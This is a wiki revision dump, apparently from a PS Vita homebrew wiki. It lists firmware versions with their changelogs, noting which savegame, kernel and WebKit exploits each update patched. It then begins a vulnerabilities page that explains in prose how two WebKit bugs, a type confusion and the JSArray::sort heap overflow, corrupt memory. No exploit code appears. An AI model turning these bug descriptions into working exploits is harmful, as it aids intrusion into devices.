* A direct link to [PS Store] is made available for new applications that users may discover on [near].<br />
* Users can now update data at any time within [near], provided they are within the same location.<br />
|-<br />
|align=center|'''1.67'''<ref>http://exophase.com/36431/ps-vita-firmware-1-67-goes-live/</ref><br />April 11, 2012<br />
|<br />
;System<br />
* Resolves an issue with the camera functionality when playing ''Dream Club Zero Portable''.<ref>http://www.jp.playstation.com/psvita/update/</ref> <br />
|-<br />
|align=center|'''1.69'''<ref>http://blog.us.playstation.com/2012/06/11/ps-vita-at-e3-minor-system-software-update-coming/</ref><br />June 11, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Improved system stability<br />
* A savegame exploit within Super Collapse 3 has been patched, disallowing the usage of VHBL via the game.<ref>12 June 2012, [http://wololo.net/2012/06/12/ps-vita-firmware-1-69-patches-the-super-collapse-3-exploit/ PS Vita Firmware 1.69 patches the Super Collapse 3 exploit], Wololo.net</ref><br />
* Resolves a compatibility issue with the PlayStation Portable game ''Conception: Ore no Kodomo wo Undekure!''.<ref>http://andriasang.com/con1f1/conception_firmware/</ref> <br />
|-<br />
|align=center|'''1.691'''<br />July 4, 2012<br /><small>''Optional''</small><br />
|<br />
;System<br />
* Resolves a compatibility issue with the PS Vita demo for ''Escape Plan''.<br />
|-<br />
|align=center|'''1.80'''<ref>[http://blog.us.playstation.com/2012/08/14/psone-classics-coming-to-ps-vita-via-the-latest-system-software-update-v1-80/ PSone Classics Coming to PS Vita via the latest System Software Update (v1.80) – PlayStation.Blog]. Blog.us.playstation.com (2012-08-14). Retrieved on 2013-08-23.</ref><br />August 28, 2012<br />
|<br />
;System<br />
* Users can now control the home screen, as well as some applications like [Music] and [Video], with the PS Vita system's buttons.<br />
* Notification settings under [Sound & Display Settings] have been moved to their own [Notification Settings] menu.<br />
* The items under [Date & Time] > [Date & Time Settings] have been changed.<br />
* A Japanese keyboard has been added.<br />
* Memory cards are now locked to PSN accounts, to prevent users from switching between accounts. The system will refuse to accept a memory card locked to another account unless the memory card is reformatted.<ref>http://i.imgur.com/4nsEl.jpg</ref><br />
* The layout of category lists have been improved in [Photos], [Music], and [Videos].<br />
* The [Notification Center] has been redesigned.<br />
* Importing content from a PC or PlayStation 3 has been improved.<br />
* The [Help] feature of the LiveArea has been improved.<br />
* Icons for some menu items have been changed.<br />
* Users can now report some errors to Sony Computer Entertainment.<br />
* Background colors have been changed.<br />
* Fixed a [[Vulnerabilities#Stack_buffer_overflow_in_sceSblDmac5EncDec|stack buffer overflow in sceSblDmac5EncDec]] and a ton of other vulns.<br />
<br />
;Remote Play<br />
* Added [Cross-Controller] feature to allow the PS Vita system to interact as a secondary controller with a PlayStation 3 system.<br />
<br />
;Games<br />
* Users can now play select PSone Classics from the PlayStation Store.<br />
* Users can now map more combinations of PSP system buttons to the PS Vita right analog stick when playing PSP games or minis. In addition, users can also map a PSP system button to each of the four corners of the PS Vita system touch screen.<br />
* [Import Saved Data] has been added to the LiveArea screen. This will only be shown for games that support this feature.<br />
<br />
;Photos<br />
* The MPO format can now be viewed on the PS Vita system. Additionally, it is now possible to transfer MPO files using a PlayStation 3 or PC using Content Manager. 3D and multi-angle viewing are not supported.<br />
<br />
;Music<br />
* Playlists in iTunes (10.6.3 or later), M3U, and M3U8 formats are now supported in [Music].<br />
* Playlists can also be transferred from a PS3 system.<br />
<br />
;Videos<br />
* Playback speed control and repeat play have been added to [Video].<br />
* When moving the progress bar during video playback, it now shows the image of the specified location in the video.<br />
* A thumbnail for videos will now be generated automatically when there is no thumbnail information available.<br />
* Users can now copy photos or videos to a PC or PS3 while a photo or video is displayed.<br />
<br />
;Friends<br />
* Users can now delete multiple friend requests simultaneously.<br />
<br />
;Near<br />
* [near] can now gather information of surrounding Wi-Fi access points without an Internet connection and will update location data based on this information at a later time.<br />
* The LiveArea screen for [near] has been improved and now shows lifetime statistics.<br />
<br />
;Group Messaging<br />
* There have been layout improvements made to [Group Messaging].<br />
* Users can now take photos using the camera to add as attachments in [Group Messaging].<br />
* The [New Message] button on the [Group Messaging] LiveArea screen has been removed.<br />
<br />
;Maps<br />
[Maps] has been improved by adding a button to the top of the screen to switch between [Search for Location] and [Search for Directions]. Users can also touch and hold a location on the map to place a flag.<br />
<br />
;Browser<br />
* The use of the rear touchpad for scrolling and zooming is now supported in the [Browser].<br />
* Users are no longer able to use a JavaScript bookmark trick to download YouTube videos in the [Browser].<br />
* A button has been added to the [Browser] to immediately go to the top of the page.<br />
<br />
;Party<br />
* Users can now view a history of up to 100 chat messages and information in [Party].<br />
|-<br />
|align=center|'''1.81'''<ref>[https://twitter.com/PlayStation/status/247851681428164609 Twitter / PlayStation: PS Vita system software update]. Twitter.com. Retrieved on 2013-08-23.</ref><br />September 17, 2012<br />
|<br />
;System<br />
* Software stability has been improved.<br />
* A savegame exploit within Monster Hunter Freedom Unite has been patched, disallowing the usage of VHBL via the game.<ref>18 September 2012, [http://wololo.net/2012/09/18/vita-firmware-1-81-is-out-patches-vhbl/ Vita Firmware 1.81 is out, patches VHBL], Wololo.net</ref><br />
<br />
;Treasure Park<br />
* An issue was resolved where the game would fail to load properly if the user had received too many treasure sheets.<br />
|-<br />
|}<br />
<br />
=== Version 2 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''2.00'''<ref>[http://blog.us.playstation.com/2012/11/13/playstation-plus-for-ps-vita-available-next-week-take-the-tour/ PlayStation Plus for PS Vita Available Next Week – Take the Tour – PlayStation.Blog]. Blog.us.playstation.com (2012-11-13). Retrieved on 2013-08-23.</ref><br />November 19, 2012<br />
|<br />
;System<br />
* System buttons can now be used in more applications.<br />
* Turkish has been added as a system language.<br />
* In [Settings], users can now set how they will be alerted depending on the type of notification.<br />
* [Disconnect Wi-Fi Connection Automatically] has been added to [Network] > [Wi-Fi Settings].<br />
* [PlayStation Network]<br />
* Support for PlayStation Plus has been added.<br />
* Users can now connect their PlayStation Network account to Twitter.<br />
* [Avatar], [Panel], [Online ID], [About Me] and [My Languages] under [PlayStation Network] > [Account Information] have been moved to the new category [Profile].<br />
* [PlayStation Mobile] has been added under [System].<br />
* Screenshots are now saved in the background.<br />
* Trophy synchronization is now performed in the background.<br />
* A savegame exploit within Urbanix has been patched.<br />
* Users can now delete screenshots or songs from PlayStation Portable games.<br />
<br />
;Content Manager<br />
* [Content Manager] has been redesigned.<br />
* Users can now transfer content to and from PlayStation Plus online storage, to and from a PS3, and to and from a PC via Wi-Fi.<br />
<br />
;Browser<br />
* The rendering engine has been improved.<br />
* The [Browser] now uses additional GPU processing power.<br />
* Tapping on a YouTube link will now open the respective video in the YouTube app.<br />
* The HTML5 and JavaScript engines have been upgraded.<br />
* Users can now send their current [Browser] URL using their Twitter settings.<br />
* Users can now access the [Browser] while in an application or game.<ref>Shuhei Yoshida on Twitter. https://twitter.com/yosp/status/270429820712783872</ref><br />
* A pointer can now be used (in conjunction with pressing L or R and tapping on the screen) to select links.<br />
<br />
;Apps<br />
* [Email] has been added as an application.<br />
<br />
;Maps<br />
* [Maps] can now display weather information for locations where it is available.<br />
<br />
;Near<br />
* The layout of [Near] has been revised.<br />
<br />
;Friends<br />
* The activities list for Friends has been moved to the LiveArea screen.<br />
* Users can now attach a comment when sending a friend request.<br />
* Users can now file a [Grief Report] for inappropriate comments when sent with a friend request.<br />
* TIFF, BMP, PNG, GIF, and MPO are now supported as file formats in [Group Messaging].<br />
<br />
;Videos<br />
* The PS Vita system can now display videos with 1080 resolution.<br />
* Videos can now display captioning.<br />
* Videos can now be played in slow motion.<br />
* Users can now skip chapters in videos.<br />
* Folders can now be transferred from a PS3 or PC to the PS Vita for [Photos] and [Videos].<br />
* When browsing lists in Music and Videos, titles will now scroll horizontally if they are too long.<br />
<br />
;PSone Classics<br />
* [Assign Touchscreen] and [Assign Rear Touch Pad] have been added to [Controller Settings].<br />
* [Custom] has been added to [Other Settings] > [Screen Mode].<br />
|-<br />
|align=center|'''2.01'''<ref>[http://www.playstationlifestyle.net/2012/12/03/ps-vita-firmware-v2-01-is-live-download-now/ PS Vita Firmware v2.01 is Live, Download Now]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 3, 2012<br />
|<br />
;PlayStation Plus<br />
* Issue with the [Upload Automatically] setting for saved data has now been corrected.<br />
<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.02'''<ref>[http://www.playstationlifestyle.net/2012/12/18/playstation-vita-system-software-version-2-02-now-available-for-download/ PlayStation Vita System Software Version 2.02 Now Available For Download]. Playstationlifestyle.net. Retrieved on 2013-08-23.</ref><br />December 19, 2012<br />
|<br />
;System<br />
* Improved system stability<br />
|-<br />
|align=center|'''2.05'''<ref>[http://www.playstationlifestyle.net/2013/01/22/ps-vita-system-software-version-2-05-likely-coming-today-seems-to-be-mandatory/ PS Vita System Software Version 2.05 Likely Coming Today, Seems to be Mandatory]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><br />January 24, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in UNO game. <br />
|-<br />
|align=center|'''2.06'''<ref>[https://twitter.com/PlayStation/status/311264776577765376 Twitter / PlayStation: Heads up - PS Vita v2.06 software]. Twitter.com. Retrieved on 2013-08-23.</ref><br />March 12, 2013<br />
|<br />
;System<br />
* Improved system stability<br />
* Closes exploit in Dissidia Duodecim PSP game.<br />
* Closes JavaScript URL spoofing exploit in Browser.<ref>[http://www.securityfocus.com/archive/1/525576 Sony Playstation Vita Browser - firmware 2.05 - Adressbar spoofing]. Securityfocus.com. Retrieved on 2013-12-09.</ref><br />
|-<br />
|align=center|'''2.10'''<ref>[http://blog.us.playstation.com/2013/04/09/ps-vita-system-software-update-v-2-10/ PS Vita System Software Update (v.2.10) – PlayStation.Blog]. Blog.us.playstation.com (2013-04-09). Retrieved on 2013-08-23.</ref><ref>[http://uk.playstation.com/psvita/support/system-software/detail/item596991/Update-features-%28ver-2-10%29/ Update features (ver 2.10) - PS Vita System Software]. Uk.playstation.com. Retrieved on 2013-08-23.</ref><br />April 9, 2013<br />
|<br />
;System<br />
* Users can now create folders, with a maximum of 10 icons per folder, and up to 100 icons (including folders) on the home screen.<br />
* Users can now verify which PS Vita card is in their system by looking at the information bar.<br />
* Users can now save home screen layouts per PS Vita card.<br />
* When [Mute Automatically] is toggled in [Settings], the PS Vita will mute speakers when a headset is unplugged. Similarly, music will now pause if a headset is unplugged when the music app is used.<br />
* [Use Wi-Fi in Power Save Mode] has been added to [Power Save Settings].<br />
* [Disconnect Wi-Fi Connection Automatically] has been removed.<br />
* Patches an exploit in the game Apache Overkill.<ref>09 September 2013, [http://wololo.net/2013/04/10/mandatory-vita-2-10-update-live-and-blocks-apache-overkill-exploit/ Mandatory Vita 2.10 Update Live and Blocks Apache Overkill Exploit], Wololo.net</ref><br />
<br />
;PlayStation Plus<br />
* PlayStation Plus members can now automatically update [PlayStation Mobile] software and upload game save data using a 3G connection.<br />
* Users can now upload or download game save data using a 3G network.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been added (a memory card is required; some videos are not supported).<br />
<br />
;Email<br />
* Enhancements to [Email] now allow users to view HTML messages, add multiple email addresses to contacts, and search messages.<br />
<br />
;Group Messaging<br />
* Users can now send messages to multiple recipients.<br />
<br />
;Photos<br />
* Still images can now be displayed in high resolution when zoomed in.<br />
<br />
;Content Manager<br />
* Users can now check for system updates when plugging their PS Vita into their PS3 system. The system version of the PS3 must be 4.40 or higher.<br />
* Users can now add a name for the PS Vita backup data when saving to a PS3 or PC. The system version of the PS3 must be 4.40 or higher, and the Content Manager Assistant application must be updated.<br />
<br />
;PlayStation Store<br />
* When reporting PlayStation Mobile content as inappropriate, users can now include details.<br />
|-<br />
|align=center|'''2.11'''<ref>[http://www.psu.com/a019092/PS-Vita-firmware-211-is-now-live [UPDATE&#93; PS Vita firmware 2.11 is now live - PlayStation Universe]. Psu.com (2013-04-16). Retrieved on 2013-08-23.</ref><br />April 16, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
* Stabilizes the playback of certain titles.<br />
|-<br />
|align=center|'''2.12'''<ref>[http://terminalgamer.com/2013/05/07/optional-ps-vita-system-update-2-12-live-now/ Optional PS Vita System Update 2.12 Live Now]. Terminal Gamer (2013-05-08). Retrieved on 2013-08-23.</ref><br />May 8, 2013<br />
|<br />
;System<br />
* Improved system stability.<br />
|-<br />
|align=center|'''2.50'''<br />''Pre-installed Only''<br><br />
First found on October 10, 2013<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PCH-2000 model.<br />
*It adds support for PlayStation Vita Slim (PCH-2000), but otherwise the firmware is identical to the previous version (2.12).<br />
|-<br />
|align=center|'''2.60'''<ref>[http://www.playstationlifestyle.net/2013/08/05/ps-vita-firmware-update-v2-60-released-download-now/ PS Vita Firmware Update v2.60 Released, Download Now]. PlayStation LifeStyle. Retrieved on 2013-08-23.</ref><ref>[http://wololo.net/2013/08/06/psvita-mandatory-ofw-2-60-now-live/ PSVITA Mandatory OFW 2.60 Now Live ·]. Wololo.net (2013-08-06). Retrieved on 2013-08-23.</ref><br />August 5, 2013<br />
|<br />
* Default release firmware for the PlayStation Vita TV in Japan.<br />
;System<br />
* [Devices] has been added under [Settings].<br />
** [Bluetooth Settings] has been moved to [Devices].<br />
* The Quick Access Menu when the PS button is held has been improved.<br />
* Stability improvements.<br />
* Anti-aliasing has been applied to home screen icons.<br />
* Closes exploit in Gamocracy One: Legend of Robot.<br />
* Closes undisclosed exploit in Pool Hall Pro.<br />
* Fixes screenshot compression bug for ''Gravity Rush'' and ''Everybody's Golf'' introduced in firmware 2.10.<br />
<br />
;LiveArea<br />
* The LiveArea for [Content Manager] and [Photos] has been updated.<br />
<br />
;PlayStation Plus<br />
* A [PlayStation Plus] icon has been added to the LiveArea to allow users to easily upload or download saved data.<br />
<br />
;Browser<br />
* Video support within the [Browser] has been extended.<br />
<br />
;Content Manager<br />
* Users can now use content on a remote system before transferring it.<br />
<br />
;Trophies<br />
* Trophies can now be hidden.<br />
|-<br />
|align=center|'''2.61'''<ref>[http://www.playstationlifestyle.net/2013/08/28/ps-vita-system-firmware-update-v2-61-coming-soon-improves-some-software-stability/ PS Vita System Firmware Update v2.61 Coming Soon, Improves Some Software]. PlayStation LifeStyle. Retrieved on 2013-08-28.</ref><br />August 28, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within Arcade Darts and other games has been patched, disallowing the usage of VHBL via the game.<ref>29 August 2013, [http://wololo.net/2013/08/29/ps-vita-compulsory-firmware-2-61-is-out-patches-the-arcade-exploits/ PS Vita compulsory Firmware 2.61 is out, patches the ‘Arcade’ exploits], Wololo.net</ref><br />
|-<br />
|}<br />
<br />
=== Version 3 ===<br />
{| class="wikitable"<br />
|-<br />
! style="width:180px;"|Version<br>Release date (UTC)<br><sup>''Notes''</sup><br />
!class="unsortable"|Description<br />
|-<br />
|align=center|'''3.00'''<br />November 5, 2013<br />
|<br />
;System<br />
* [Parental Controls] has been added to the home screen.<br />
* Future system software updates can now be downloaded automatically.<br />
* Portuguese (Portugal) language has been updated to reflect changes due to the Portuguese Language Orthographic Agreement of 1990.<br />
* System stability has been improved.<br />
* Several Game Exploits, Fieldrunners and others, that were actually undisclosed, got fixed. This disallows the usage of VHBL via these games.<ref>11 November 2013, [http://wololo.net/2013/11/11/sony-patched-up-to-20-exploits-with-vita-firmware-3-00/ Sony patched up to 20 exploits with Vita firmware 3.00], Wololo.net</ref><br />
<br />
;Trophies<br />
* Trophies for PS4 software can now be displayed on PS Vita.<br />
<br />
;Content Manager<br />
* Users can now transfer content to and from a PS3 with Wi-Fi on the same network, when the PS3 is version 4.50 or newer.<br />
<br />
;Messages<br />
* [Group Messaging] has been renamed to [Messages].<br />
* The icon has been changed.<br />
* Messages can now be sent to and from the PS4 and mobile devices running the PlayStation App.<br />
<br />
;Email<br />
* Contacts can now be synchronized from Gmail and Yahoo! Mail using CardDAV.<br />
<br />
;Party<br />
* The icon has been changed.<br />
* Users can now voice and text chat with friends on PS4.<br />
<br />
;Remote Play<br />
* [Remote Play] has been renamed to [PS3 Remote Play].<br />
<br />
;PS4 Link<br />
* [PS4 Link] has been added to the home screen.<br />
<br />
;Friends<br />
* The layout for the [Friends] application has changed. There are now four tabs available:<br />
** Find Player on PSN<br />
** Friends<br />
** Friend Requests<br />
** Players Blocked<br />
<br />
;Photos<br />
* Users can now take panoramic photos with the PS Vita's camera.<br />
* Panoramic photos can be viewed using the system's motion sensor.<br />
|-<br />
|align=center|'''3.01'''<ref name="PSVita301">[http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits]. Wololo.net. Retrieved on 2013-12-10.</ref><br />December 5, 2013<br />
|<br />
;System<br />
* System stability has been improved.<br />
* A savegame exploit within several games has been patched, disallowing the usage of VHBL/eCFW via the games.<ref>10 December 2013, [http://wololo.net/2013/12/10/firmware-3-01-available-some-usermode-exploits-fixed/ PS Vita System Firmware Update v3.01 - Fixes various usermode exploits], Wololo.net</ref><br />
|-<br />
|align=center|'''3.10'''<ref name="PSVita310">[http://blog.eu.playstation.com/2014/03/25/playstation-vita-system-software-update-3-10-coming-soon/ PS Vita System Software Update 3.10 Coming Soon]. PlayStation Blog. Retrieved on 2014-03-25.</ref><br />March 25, 2014<br />
|<br />
;System<br />
* The number of applications that can be displayed on the home screen has increased to 500.<br />
* [Adjust Daylight Savings Automatically] has been added.<br />
* [30 minutes] has been added to [Enter Standby Mode Automatically].<br />
* (''Japan only'') PocketStation functionality has been integrated into the system software.<ref name=fami310>2014-03-25, [http://www.famitsu.com/news/201403/25050481.html PS Vita、PS Vita TVのシステムソフトウェア バージョン3.10が提供開始、カレンダー機能追加など盛りだくさん!], Famitsu</ref><br />
* Added DualShock 4 compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Added PlayStation Mobile compatibility to the PlayStation Vita TV.<ref name=fami310/><br />
* Use of an [External Keyboard] is now supported (for example, PlayStation Bluetooth Wireless Keypad).<br />
* Savegame exploits in various exploit titles got fixed.<br />
* Savegame exploits in various additional undisclosed exploit titles got fixed as well.<br />
* Internal firmware changes now prevent the execution of bigger files (e.g. TN-V/ARK eCFW) via exploits in PSP Minis, if these PSP Minis lack network functions.<br />
<br />
;Apps<br />
* Added a new [Calendar] application that synchronizes with Google Calendar.<br />
<br />
;Content Manager<br />
* Added [Manage Content on Memory Card] option.<br />
<br />
;Messages<br />
* Messages sent and received now include voice messages.<br />
<br />
;Parental Controls<br />
* Access to the PS Store can now be restricted.<br />
* Added a children's age guide.<br />
<br />
;Music<br />
* Users can now search on connected devices such as a PC.<br />
<br />
;Video<br />
* Users can now sort content by size.<br />
<br />
;Photo<br />
* [Rotate Screen Automatically] has been added.<br />
* [Freeform] has been added to the list of panoramic options.<br />
|-<br />
|align=center|'''3.12'''<ref name="PSVita312">[http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/ PS Vita mandatory firmware 3.12 available – Fixes memory card problems]. Wololo.net. Retrieved on 2014-03-28.</ref><br />March 28, 2014<br />
|<br />
;System<br />
* System software stability during use of some features has been improved.<br />
* Fixes problems with bigger memory cards,<ref>http://wololo.net/2014/03/28/ps-vita-firmware-3-12-available-fixes-memory-card-problems/</ref> which occurred in system software 3.10.<br />
|-<br />
|align=center|'''3.15'''<br />April 30, 2014<br />
|<br />
;System<br />
* ''(PS Vita TV only)'' Full functionality for PlayStation Vita TV remote play with PS4 systems added.<ref>2014-04-17, [http://www.famitsu.com/news/201404/17051793.html PS4“システムソフトウェア バージョン1.70”の内容が公開、ニコニコ生放送や各配信サービス内の動画アーカイブへの対応、HDCP信号オフなど], Famitsu</ref><ref>2014-04-17, [http://weekly.ascii.jp/elem/000/000/214/214642/ PS4がバージョン1.70へのアップデートでニコ生HD配信などに対応!], Weekly ASCII</ref><br />
* Savegame exploits in various undisclosed exploit titles have been fixed.<ref>http://wololo.net/2014/04/30/ps-vita-firmware-3-15-is-now-available/</ref><br />
<br />
; PS4 Link<br />
* Linking PS Vita with PS4 is now easier.<br />
|-<br />
|align=center|'''3.18'''<br />August 7, 2014<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*No entry sign changed.<br />
|-<br />
|align=center|'''3.20'''<br />''Pre-installed Only''<br><br />
First found on October 14, 2014<br />
|<br />
;System<br />
*This firmware was only available pre-installed on the initial release of the PlayStation TV in North America and Europe.<br />
*It allows the usage of non-Asian PSN accounts on the PS TV, if set up via PS3 or proxies, but otherwise the firmware is identical to the previous version (3.18).<br />
|-<br />
|align=center|'''3.30'''<br />October 2, 2014<br />
|<br />
;System<br />
* [Theme & Background] has been added to [Settings].<br />
* Full array of languages has been added to [External Keyboard] settings (previously was Japanese and US English only).<ref name=330jp/><br />
* [Import Saved Data] feature has now been fixed after becoming broken with release of system software 3.15.<br />
* PS4 Remote Play now supports two players simultaneously.<ref name=330jp/><br />
* Added timezone for Nouméa and daylight savings support for Wellington, New Zealand.<br />
* "Intellectual Property Notices" are now listed in the app menu on the LiveArea screen.<br />
* A savegame exploit, several kernel exploits, a WebKit exploit and some internal system flaws have been fixed.<ref>http://wololo.net/2014/10/04/ps-vita-firmware-3-30-what-is-patched-what-is-still-working/</ref><br />
<br />
;Trophies<br />
* Trophy rarity can now be viewed.<br />
<br />
;Calendar<br />
* Users can now attach and send events created in [Calendar] to [Messages] and [Email]. Recipients can save those events in their own calendars.<br />
* Users can now add Friends and other players to events created in [Calendar].<br />
* The Calendar app’s LiveArea now supports the next six tagged events.<ref name=330jp/><br />
<br />
;Browser<br />
* The system's [Browser] now supports closing all open windows.<ref name=330jp>[http://www.jp.playstation.com/psvita/update/ PlayStation®Vita/PlayStation®TV システムソフトウェア バージョン3.30 アップデートについて], Accessed 2 October 2014</ref><br />
* Improvements to the [Browser]'s ability to load pages and compatibility with HTML5/Javascript content have been made. HTML5test score increased from 291 to 345.<ref>2014-10-01, [http://www.psnstores.com/2014/10/ps-vita-system-update-3-30-now-live-adds-themes-improves-browser-allows-ps-vita-tv-to-use-na-accounts/ PS Vita System Update 3.30 Now Live: Adds Themes, Improves Browser, Allows PS Vita TV To Use NA Accounts], PSNStores</ref><br />
<br />
;Content Manager<br />
* Support for Content Manager Assistant with Windows XP and Mac OS X Leopard has been discontinued.<br />
<br />
;PS TV<br />
* The name of the VTE-1000 series has been changed to PlayStation TV or PS TV within system applications.<ref>2014年10月2日, [http://www.jp.playstation.com/info/support/sp_20141002_psvitatv.html PlayStation®Vita TVのシステムソフトウェア上の表記変更について], Sony Computer Entertainment Japan</ref><br />
* A maximum of 4 wireless controllers can be connected to the PS TV. The number of players depends on the game or application.<br />
* North American and European PSN accounts can now be used with the PlayStation TV.<br />
* Detailed warning prompt added to Standby/Shutdown screen on PlayStation TV devices.<br />
|-<br />
|align=center|'''3.35'''<br />October 28, 2014<br />
|<br />
;System<br />
*A savegame exploit in the PSP game Go! Sudoku has been fixed.<br />
*Enables compatibility with the Live from PlayStation app (requires firmware 3.30 or higher) available to download from the PS Store.<br />
;PS4 Link<br />
*Four-player Remote Play support to PlayStation TV.<br />
*Users can now adjust the video quality for Remote Play on the PS TV system according to the network environment.<br />
|-<br />
|align=center|'''3.36'''<br />January 14, 2015<br />
|<br />
;System<br />
*Fixes some internal functions of the PS Vita's PSP emulator.<br />
*A savegame exploit in an undisclosed PSP game has been fixed.<br />
*The PSP Emulator of the PS Vita has been updated to PSP firmware 6.61.<br />
|-<br />
|align=center|'''3.50'''<br />March 26, 2015<br />
|<br />
;System<br />
*Adds support for streaming in 60 frames per second while using PS4 Remote Play. If 60fps is enabled, the PS4 system will be unable to record gameplay while using Remote Play.<br />
*Accessibility has been added to the settings menu, with options such as zooming, inverted colors, closed captions, enlarged text and increased contrast options.<br />
*The Maps application has been removed.<br />
*'near' will not show Maps and other related content anymore.<br />
*PSN has been renamed to PlayStation Network<br />
*The [Chat] setting under [PlayStation Network] > [Sub Account Management] has been renamed as [Chat/User-Generated Media].<br />
*Sub account users can now be restricted from sending and receiving [Messages from other players] in [Messages].<br />
*The online-status of friends is no longer shown with a pop-up box.<br />
*Fixed savedata exploits in various PSP games (Arcade Darts, Patapon 2, Numblast, etc.).<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<br />
*30% of the reserved 256MB memory for the operating system now free for games.<br />
|-<br />
|-<br />
|align=center|'''3.51'''<br />May 13, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Additional fixes for the "custom bubble" exploit.<br />
*Fixes lag some users reported on the home screen of the system.<br />
|-<br />
|align=center|'''3.52'''<br />June 23, 2015<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Revoked PlayStation Mobile.<ref name="Rejuvenate">http://wololo.net/2015/06/24/ps-vita-firmware-3-52-is-out-revokes-psm-support-effectively-patching-the-rejuvenate-hack-do-not-update/</ref><br />
*Fixed the "Rejuvenate" exploit.<ref name="Rejuvenate" /><br />
|-<br />
|align=center|'''3.55'''<ref>https://web.archive.org/web/20150930182904/https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />September 30, 2015<br />
|<br />
;System<br />
*Fixed the Mail Writer exploit.<ref name="Fail-Mail">http://wololo.net/2015/09/30/playstation-vita-firmware-3-55-is-now-available-does-it-patch-the-fail-mail-flaw/</ref><br />
*Fixes several PSP usermode exploit.<ref name="Fail-Mail" /><br />
;PS4 Link<br />
*You can now adjust the setting for video resolution when using remote play on a PS Vita system. Select (PS4 Link) > [Start] > (Options) > [Settings] > [Video Quality for Remote Play] > [Resolution]. <br />
** If video or audio skips during playback, try selecting [Low (360p)] to help improve the quality.<br />
;Parental Controls<br />
*You can now restrict [Email] from starting.<br />
|-<br />
|align=center|'''3.57'''<ref>http://gematsu.com/2016/01/ps3-ps-vita-ending-facebook-link-support</ref><br />January 20, 2016<br />
|<br />
;System<br />
*Removed the system-wide Facebook integration.<br />
*Fixed kernel mode exploit that enabled the usage of eCFWs within the PSP emulator of the PS Vita.<br />
*Fixed the "custom bubble" exploit.<ref>http://wololo.net/2016/01/20/playstation-vita-system-software-3-57-is-now-available-fixes-currently-testing/</ref><br />
|-<br />
|align=center|'''3.60'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />April 6, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
|-<br />
|align=center|'''3.61'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />August 8, 2016<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Fixed <code>sceIoDevctl</code> uninitialized stack memory leak used by HENkaku.<br />
*Fixed WebKit <code>JSArray::sortCompactedVector</code> vulnerability used by HENkaku.<br />
|-<br />
|align=center|'''3.63'''<ref>https://www.playstation.com/en-us/support/system-updates/ps-vita/</ref><br />November 1, 2016<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Fixed <code>sceNetIoctl</code> use-after-free used by HENkaku.<br />
|-<br />
|align=center|'''3.65'''<br />April 18, 2017<br />
|<br />
;System<br />
*System software stability during use of some features has been improved.<br />
*Fixed PSP emulator kernel exploit used by ARK.<br />
|-<br />
|align=center|'''3.67'''<br />November 28, 2017<br />
|<br />
;System<br />
*This system software update improves the quality of the system performance.<br />
*Twitter dialog updated.<br />
*Calendar icon updated.<br />
*Added TLS 1.2 support in the web browser.<br />
*Fixed Ensō exploit.<br />
|-<br />
|align=center|'''3.68'''<br />April 10, 2018<br />
|<br />
;System<br />
*This system software update improves system performance.<br />
*Minor WebKit update (vector index masking).<ref name="WebKit-368">https://gist.github.com/StepS-/436098ac8979217d263bab2edab11ee5</ref><br />
*Fixed some devkit-specific kernel bugs.<ref name="DevKit-367">[https://twitter.com/theflow0/status/985137344570372096 Sony has fixed 3 kernel bugs in 3.68, which combined, could lead to kernel code execution on a devkit]. TheFloW (@theflow0) on Twitter</ref><ref name="DevKit-367-sceMotionDevGetEvaInfo">[https://twitter.com/theflow0/status/984919058863845378 sceMotionDevGetEvaInfo could leak 0x48 bytes of kernel stack]. TheFloW (@theflow0) on Twitter</ref><br />
|-<br />
|align=center|'''3.69'''<br />September 10, 2018<br />
|<br />
;System<br />
*[Placeholder for Sony's "release notes"]<br />
*Fixed some bugs in SceNgs<br />
*SSL library updated (along with other networking libraries that uses SceSsl), two new root certificates added<br />
|-<br />
|}<br />
<br />
[[Category:Firmware]]</div>Xyzhttp://wiki.henkaku.xyz/vita/index.php?title=Vulnerabilities&diff=8909Vulnerabilities2018-09-11T14:26:10Z<p>Xyz: /* h-encore kernel exploit */</p>
<hr />
<div>== Userland ==<br />
<br />
=== WebKit 531 (Vita FW BEFORE 2.00) ===<br />
<br />
There are two exploits used for WebKit prior to 2.00. One is a data leakage exploit CVE-2010-4577 <ref>https://code.google.com/p/chromium/issues/detail?id=63866</ref> using type confusion to treat a double as a string memory address and length. The other is a type confusion exploit CVE-2010-1807 on the parseFloat() function using a Nan as the arg.<br />
<ref>http://imthezuk.blogspot.com/2010/11/float-parsing-use-after-free.html</ref><br />
<br />
=== WebKit 536 (Vita FW 2.00 thru 3.20) (CVE-2012-3748) (2013-09-03-1) ===<br />
<br />
The heap memory buffer overflow vulnerability exists within the WebKit's JavaScriptCore JSArray::sort(...) method. This method accepts the user-defined JavaScript function and calls it from the native code to compare array items. If this compare function reduces array length, then the trailing array items will be written outside the "m_storage->m_vector[]" buffer, which leads to the heap memory corruption.<ref>http://packetstormsecurity.com/files/123088/</ref><br />
<br />
